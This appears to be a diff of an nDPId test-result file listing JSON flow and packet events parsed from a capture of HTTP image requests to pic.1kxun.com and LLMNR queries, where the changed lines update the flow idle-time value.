-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379119,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379119,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379119,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379119,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxkAAAER6ZbAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"} 